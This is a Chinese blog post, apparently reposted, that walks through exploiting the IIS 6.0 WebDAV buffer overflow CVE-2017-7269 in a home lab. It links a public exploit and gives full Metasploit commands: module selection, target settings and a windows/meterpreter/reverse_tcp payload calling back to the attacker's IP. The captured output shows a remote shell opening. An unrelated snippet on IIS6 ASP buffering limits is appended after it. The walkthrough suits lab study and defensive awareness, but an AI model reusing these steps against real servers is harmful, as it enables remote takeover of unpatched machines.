IIS6.0(CVE-2017-7269) 缓冲器溢出

漏洞描述
开启WebDAV服务对IIS 6.0存在缓冲区溢出漏洞都可以导致远程代码执行,所以对于目前的IIS 6.0用户而言,可用的变通方案就是关闭WebDAV服务。

漏洞编号
CVE-2017-7269

漏洞等级
高危

影响产品
Microsoft Windows Server 2003 R2 开启WebDAV服务的IIS6.0

漏洞环境搭建
我的环境是windows 2003 R2 Enterprise Edition,安装好IIS 6.0 之后进入服务管理,在管理器中,有一个windows拓展,拓展中有一个webdav选项,该选项默认时禁止状态,右键选择允许就可以了。

随后windows+R–>services.msc–>打开webcClient服务,完成配置


漏洞测试
攻击机:kali IP :192.168.48.131
受害机:windows2003 IP :192.168.48.146
下载exploit:https://github.com/Al1ex/CVE-2017-7269
将exp放到
/usr/share/metasploitframework/modules/exploits/windows/iis目录下

msf > search cve-2017-7269

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/iis/cve-2017-7269 2017-03-31 good CVE-2017-7269 Microsoft IIS WebDav ScStoragePathFromUrl Overflow
exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Microsoft IIS WebDav ScStoragePathFromUrl Overflow


msf > use exploit/windows/iis/cve-2017-7269
msf exploit(windows/iis/cve-2017-7269) > show options

Module options (exploit/windows/iis/cve-2017-7269):

Name Current Setting Required Description
---- --------------- -------- -----------
HttpHost localhost yes http host for target
PhysicalPathLength 19 yes length of physical path for target(include backslash)
RHOST yes The target address
RPORT 80 yes The target port (TCP)


Exploit target:

Id Name
-- ----
0 Microsoft Windows Server 2003 R2


msf exploit(windows/iis/cve-2017-7269) > set RHOST 192.168.48.146 //设置对方ip
RHOST => 192.168.48.146
msf exploit(windows/iis/cve-2017-7269) > set HttpHost 192.168.48.146 //设置对方网站
HttpHost => 192.168.48.146
msf exploit(windows/iis/cve-2017-7269) > set payload windows/meterpreter/reverse_tcp //设置返回载荷
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/iis/cve-2017-7269) > set LHOST 192.168.48.131 //设置本机ip
LHOST => 192.168.48.131
msf exploit(windows/iis/cve-2017-7269) > exploit //溢出

[*] Started reverse TCP handler on 192.168.48.131:4444
[*] Sending stage (179779 bytes) to 192.168.48.146
[*] Meterpreter session 1 opened (192.168.48.131:4444 -> 192.168.48.146:1043) at 2018-01-24 22:49:23 +0800

meterpreter >

 

 

 

 

 

转载于:https://www.cnblogs.com/kuaile1314/p/11489707.html

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
IIS6缓冲区超过其配置限制 在IIS6上运行ASP的时候,有时候会出现:“IIS6缓冲区超过其配置限制”这个错误,原因是asp脚本最后产生的页面太大,超过缓冲区大小。我们的报表有服务器端分页,每页行数由用户设置,设置为0的时候表示一页显示,这样,当数据太多并且一页显示的时候会报错,比如有个固定资产的表,设置为每页30行的时候有580页,可以正常显示,但是设置为每页0行的时候就无法显示了,原来的代码处理的时候,每当记录数超过一定范围的时候(比如900条数据),就Respond.flush一下,清空缓冲区保证可以再使用。不过新版本代码,没有合适的地方再加Respond.flush这一句,代码改起来比较麻烦。 从Google上搜索了一下解决办法,在这里集一下,通通没有验证,不过应该有管用的;) 1.asp页面合适的地方加入Respond.flush 以下都是各处copy的: -修改IIS配置的: 2.停止IIS服务,然后用记事本修改C:\WINDOWS\system32\inetsrv\MetaBase.xml 的: AspBufferingLimit="4194304" //即默认4M 为: AspBufferingLimit="8388608" //改为8M或更多 重启IIS 3.可以在“C:\Inetpub\AdminScripts”路径下在命令行输入: adsutil set w3svc/2/root/autoupdate/aspbuf-feringlimit -1 adsutil set w3svc/aspbufferinglimit -1 命令来将缓存还原(默认大小为4MB),如果当前需要Response的大小超过这个限制,那么可以尝试将-1改为相应的大小,比如40MB就是41943040: adsutil set w3svc/aspbufferinglimit 41943040 注:2,3应该是殊途同归。 4.在IIS"主目录"-"配置"-"选项",将启用缓存前面的勾去掉,即禁用缓存。 注:比较怀疑这个说法,即便管用,对性能应该也有一些影响。不过还是列出来,以后可以试一下。 -修改单个页面的: 5.可以通过服务器端iis里设置缓冲区大小,也可以通过程序更改这一值 <%@ page buffer="10240kb" autoFlush="false" %> 注: buffer:他的值可以是"none"或者一个数值。 指定处理JSP工作时的out处理网页出入内容 的模式。如果值为none,那么就不会有缓存,而所有的输出都是由servletresponse的printerwriter。 若是一个数值,表示缓存的大小,单位是kb,那么输出的缓存大小至少会大于这个值。 根据autoFlush(可取true或者false)属性而定,输入内容超出缓存大小时是否要清除(true)还是产 生异常(false)。一般的,缓存设置为8kb以 6.可以在ASP应用程序的头部添加如下语句: <%Response.Buffer = False%> 注:同4. 个人认为如果第5个办法管用的话,还是比较好的,比较环保。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值